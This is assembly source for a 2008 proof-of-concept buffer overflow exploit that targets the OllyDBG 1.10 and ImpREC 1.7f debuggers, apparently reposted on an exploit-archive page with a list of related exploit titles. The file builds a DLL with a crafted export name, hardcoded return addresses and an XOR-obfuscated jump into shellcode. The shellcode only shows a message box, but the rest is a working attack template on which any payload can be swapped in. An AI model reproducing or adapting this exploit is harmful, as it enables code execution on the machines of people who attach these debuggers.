;-------------------------------------------------------------------------;

; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow vulnerability

; PoC (probably older versions affected too, not tested though.)

;

; Included shellcode shows a messagebox (WinXP SP2) and is configured for

; OllyDBG. See lines 60-105 for more details

;-------------------------------------------------------------------------;

; Usage:

; Load this DLL to your process and try to attach OllyDBG or ImpREC

; to it -> Shellcode executed >:)

;

; Shellcode gets fired also if program is run under OllyDBG.

;

; Bug discovered and PoC coded by:

; ~ Defsanguje, Defsanguje [at] gmail [dot] com [July 7 2008]

;-------------------------------------------------------------------------;

; Coded in FASM

;-------------------------------------------------------------------------;

format PE GUI 4.0 DLL

include 'win32a.inc'

entry DllEntryPoint

section '.code' code readable executable

proc DllEntryPoint, hinstDLL,fdwReason,lpvReserved

mov eax, TRUE

ret

endp

;-------------------------------------------------------------------------;

; Modified version from original export-macro.

;-------------------------------------------------------------------------;

macro ExportExploit dllname,[label]

{ common

local module,addresses,names,ordinal,count

count = 0

forward

count = count 1

common

dd 0,0,0,RVA module,1

dd count,count,RVA addresses,RVA names,RVA ordinal

addresses:

forward

dd RVA label

common

names:

forward

local name

dd RVA name

common

ordinal: count = 0

forward

dw count

count = count 1

common

module db dllname,0

forward

;-------------------------------------------------------------------------;

; Exploit for OllyDBG v1.10

;-------------------------------------------------------------------------;

a: name

db 3e0h dup (90h)

dd 6d553b78h ; ESP to EBP

dd 6d55e5ffh ; EBP to EAX

dd 0defdefdeh

dd 0defdefdeh

dd 6d56d25eh ; add eax, 40h

dd 0defdefdeh

dd 6d52e1efh ; jmp EAX =)

db 40h-18h dup(90h)

c: push eax

mov eax, (ShellCodeStart-c) xor 0defdefdeh

xor eax, 0defdefdeh

add eax, [esp]

jmp eax

b: db 0bd0h - (ShellCodeEnd-ShellCodeStart) - (b-a) dup (90h)

ShellCodeStart:

db 81h,0ECh,07Dh,0FFh,0FFh,0FFh

db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh

db 8Ah,05h,45h,7Eh ; Address of messagebox in winxp sp2

db 0FFh,0D3h

ShellCodeEnd:

dd 0045F823h ; New EIP

db 300h dup(90h)

db 0

;-------------------------------------------------------------------------;

; Exploit for ImpREC v1.7f

;-------------------------------------------------------------------------;

; name

; db 0C0Ch - (ShellCodeEnd-ShellCodeStart) dup (90h)

;ShellCodeStart:

; db 81h,0ECh,07Dh,0FFh,0FFh,0FFh

; db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh

; db 8Ah,05h,45h,7Eh ; Address of messagebox in winxp sp2

; db 0FFh,0D3h

;ShellCodeEnd:

; dd 12c1b8h ; New EIP

; db 0

;-------------------------------------------------------------------------;

common

local x,y,z,str1,str2,v1,v2

x = count shr 1

while x > 0

y = x

while y < count

z = y

while z-x >= 0

load v1 dword from names z*4

str1=($-RVA $) v1

load v2 dword from names (z-x)*4

str2=($-RVA $) v2

while v1 > 0

load v1 from str1 %-1

load v2 from str2 %-1

if v1 <> v2

break

end if

end while

if v1<v2

load v1 dword from names z*4

load v2 dword from names (z-x)*4

store dword v1 at names (z-x)*4

store dword v2 at names z*4

load v1 word from ordinal z*2

load v2 word from ordinal (z-x)*2

store word v1 at ordinal (z-x)*2

store word v2 at ordinal z*2

else

break

end if

z = z-x

end while

y = y 1

end while

x = x shr 1

end while }

section '.edata' export data readable

;-------------------------------------------------------------------------;

; Call the macro

;-------------------------------------------------------------------------;

ExportExploit 'exploit.dll',

$

;-------------------------------------------------------------------------;

【OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC】相关文章：

★ MS Internet Explorer (FTP Server Response) DoS Exploit

★ Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

★ FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

★ WS_FTP Home/Professional FTP Client Remote Format String PoC

★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

★ ESET Smart Security 3.0.667.0 Privilege Escalation PoC